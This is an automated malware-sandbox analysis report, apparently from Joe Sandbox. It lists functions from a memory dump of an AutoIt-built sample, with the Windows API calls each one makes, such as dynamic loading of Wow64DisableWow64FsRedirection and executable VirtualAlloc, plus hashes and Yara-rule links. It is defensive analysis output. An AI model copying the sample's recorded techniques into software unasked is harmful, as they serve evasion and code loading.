                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: b2edff2eb0675c252e78caf759205ecf1338c47cdbd68b4b6c380d34d2643f38
                                              • Instruction ID: 1d5a301672e4ea536bbeef4e9993a2a94425109c286d9a6451fa7d5c3e3da091
                                              • Opcode Fuzzy Hash: b2edff2eb0675c252e78caf759205ecf1338c47cdbd68b4b6c380d34d2643f38
                                              • Instruction Fuzzy Hash: 782181B1644109AFDB10DF28DCD1DAA77ECEF4A354B14409AF9019B3A1EB31EC01CB60
                                              Function 00BD6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BD6D3B
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BD6D4B
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BD6D70
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: c0add64a4fd5ece4c5b6a378f99d5a39c621864b91d541d9bd7bd0b5a185c05a
                                              • Instruction ID: 8b3e0d7425d947483f8a90e35f773cb15e71805d41bf2fa73329912e9458e007
                                              • Opcode Fuzzy Hash: c0add64a4fd5ece4c5b6a378f99d5a39c621864b91d541d9bd7bd0b5a185c05a
                                              • Instruction Fuzzy Hash: 1B21FF32611118BFDF118F54DC81FBB7BBAEF89760F01817AF9459B2A0DA719C518BA0
                                              Function 00BD770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BD7772
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BD7787
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BD7794
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: 0eab540b05734c8d98a05b64351b7b64d3f079864e08f200cdb70d505f098050
                                              • Instruction ID: b7585adfff18779a87cc83b030cf1d1bded16ba2ccbfb5fa9af40968050eaa0a
                                              • Opcode Fuzzy Hash: 0eab540b05734c8d98a05b64351b7b64d3f079864e08f200cdb70d505f098050
                                              • Instruction Fuzzy Hash: 6C113A32244208BFEF209F64CC01FEBB7ACEF88B54F014529FA45921D0E671E811CB10
                                              Function 00B54B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54AD0), ref: 00B54B45
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B54B57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: a502e4d6270b15bd2afff9ca21b4ae6444f007f17d0c360e6337944c2f1e0a92
                                              • Instruction ID: 98cb5ba76f63fb4fb231ce95fea04c8512b2a12d62cc54742b1eaab546ee70f8
                                              • Opcode Fuzzy Hash: a502e4d6270b15bd2afff9ca21b4ae6444f007f17d0c360e6337944c2f1e0a92
                                              • Instruction Fuzzy Hash: 30D01234A14713CFD7209F31D868B16B6D4EF05355B1588BB9897D6260FB70D4C0C654
                                              Function 00B54C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54B83,?), ref: 00B54C44
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B54C56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: f0731d1644abdba0c589e7530e9ea670c041fa9ab541a08bc87a844837b37390
                                              • Instruction ID: c34a280f92bc41490b39c5d1ba6565619c14217f32d2cbf9dfe6ab48e21a7112
                                              • Opcode Fuzzy Hash: f0731d1644abdba0c589e7530e9ea670c041fa9ab541a08bc87a844837b37390
                                              • Instruction Fuzzy Hash: ECD01730515713CFD7209F31D91876AB7E4EF05356B1588BB99A6E62A8FB70D8C0CA50
                                              Function 00B54C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54BD0,?,00B54DEF,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54C11
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B54C23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 55f980cfe092f9e9cdcdf006ab5fa5af7ea13e688167a23095e177028297eba6
                                              • Instruction ID: 8e9b605322e2deee92dc4a21e08d3de061364cb300e0839cd43ee792fd3bc8a8
                                              • Opcode Fuzzy Hash: 55f980cfe092f9e9cdcdf006ab5fa5af7ea13e688167a23095e177028297eba6
                                              • Instruction Fuzzy Hash: 88D0E23051A713CFD720AB75D918716BAE5EF09356B1588BA9896E62A0EBB0D880CA50
                                              Function 00BD0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00BD1039), ref: 00BD0DF5
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BD0E07
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: 7285ba4fde11712f8d245c7565a91b3bace92bc7c311b296c8560b785034bdeb
                                              • Instruction ID: f16e1c854a46aefbf71fbcea9758d87530029ceca0d95306f9e17867c57a5dbc
                                              • Opcode Fuzzy Hash: 7285ba4fde11712f8d245c7565a91b3bace92bc7c311b296c8560b785034bdeb
                                              • Instruction Fuzzy Hash: E9D0E270920723CFD720AB76C80879AB7E9EF05352F158C7E9496E2291EAB0D890CB55
                                              Function 00BC90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BC8CF4,?,00BDF910), ref: 00BC90EE
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BC9100
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: 24886207c0776fc3784951df306c2451fde32d3dd8da85126bbfd0110f170639
                                              • Instruction ID: 408f08244ae180e28812bb7fcd559b90964d8554315b4c8402260c5a775e79a0
                                              • Opcode Fuzzy Hash: 24886207c0776fc3784951df306c2451fde32d3dd8da85126bbfd0110f170639
                                              • Instruction Fuzzy Hash: E8D0E234514713DFEB209B71D82EA16B6E5AF05391B1A887E9496E66A0FA70C880CA90
                                              Function 00B91714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: d0fd03971af4a4d79072ab53e0fa16e253737b71d0220265ade060464a98d096
                                              • Instruction ID: 5cc1f600550b080715ba3f69ea6ad365b285f45175cf917994d6b8e5704a80e7
                                              • Opcode Fuzzy Hash: d0fd03971af4a4d79072ab53e0fa16e253737b71d0220265ade060464a98d096
                                              • Instruction Fuzzy Hash: 2DD012F180910BEACF0097D498D89B977FCA708701F5008F2B506A3090E6398F54F621
                                              Function 00BA717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                              • Instruction ID: b942e7c42c7d116a0d68ac9b7b14216c748dfce02ae8281af500d7588edb0ed2
                                              • Opcode Fuzzy Hash: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                              • Instruction Fuzzy Hash: 55C13875A0C216AFCB14CFA4C884AAEBBF5FF49714B158598E805EB351DB30ED81DB90
                                              Function 00BCE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00BCE0BE
                                              • CharLowerBuffW.USER32(?,?), ref: 00BCE101
                                                • Part of subcall function 00BCD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BCE301
                                              • _memmove.LIBCMT ref: 00BCE314
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: e9a8053213897237a320edbe461afb0e9ec4c5ce26aa6211a49bddfa6d897e1d
                                              • Instruction ID: 0fa2c1c6b4ddf5a84ce3be9ed35011938ac0c929ed66de728885e94e8b574c93
                                              • Opcode Fuzzy Hash: e9a8053213897237a320edbe461afb0e9ec4c5ce26aa6211a49bddfa6d897e1d
                                              • Instruction Fuzzy Hash: DEC15871608301DFC715DF28C480A6ABBE4FF89714F1489AEF8A99B351D731E946CB82
                                              Function 00BC8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00BC80C3
                                              • CoUninitialize.COMBASE ref: 00BC80CE
                                                • Part of subcall function 00BAD56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00BAD5D4
                                              • VariantInit.OLEAUT32(?), ref: 00BC80D9
                                              • VariantClear.OLEAUT32(?), ref: 00BC83AA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: ba6899e1fb5c1b524507d28b1347df271f9f09575ffd4d95f4cec339f1e368c3
                                              • Instruction ID: b3aef4d8c8c5cb34c891ba2f78ff768a7318005d9ef0e2f8e3e04cf15c04ff22
                                              • Opcode Fuzzy Hash: ba6899e1fb5c1b524507d28b1347df271f9f09575ffd4d95f4cec339f1e368c3
                                              • Instruction Fuzzy Hash: 42A12535604B019FDB10DF54C885B2AB7E4BF89354F18449DF99A9B3A1CB30ED05CB96
                                              Function 00BA7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                              Download Yara Rule
                                              APIs
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00BA76EA
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BA7702
                                              • CLSIDFromProgID.COMBASE(?,?), ref: 00BA7727
                                              • _memcmp.LIBCMT ref: 00BA7748
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 8c9fefb23eeb8064c33767f370e4e6b4fd7a3a38f20496df21988c23d397f2aa
                                              • Instruction ID: 118b39d4911b12451cf4d12a3895e5e3d396e898b8d255729370bd90f0abf7af
                                              • Opcode Fuzzy Hash: 8c9fefb23eeb8064c33767f370e4e6b4fd7a3a38f20496df21988c23d397f2aa
                                              • Instruction Fuzzy Hash: D7811E75A04109EFCB04DFA8C984EEEB7F9FF89315F204599E505AB250DB71AE05CB60
                                              Function 00BA687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 287c084694bb247acd395f90c408112840f2c020f0794be161b91b00589d918d
                                              • Instruction ID: 422887f989117446de1478ec2cfbcaf4b503272c12ba7526fc137160fc9febdd
                                              • Opcode Fuzzy Hash: 287c084694bb247acd395f90c408112840f2c020f0794be161b91b00589d918d
                                              • Instruction Fuzzy Hash: 9751B7B47083019ADB24AF65D89173AB3E5EF56310F28C89FE596D7291DB74D8408B01
                                              Function 00BB955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                              • _free.LIBCMT ref: 00BB96A2
                                              • _free.LIBCMT ref: 00BB96A9
                                              • _free.LIBCMT ref: 00BB9714
                                                • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                              • _free.LIBCMT ref: 00BB971C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
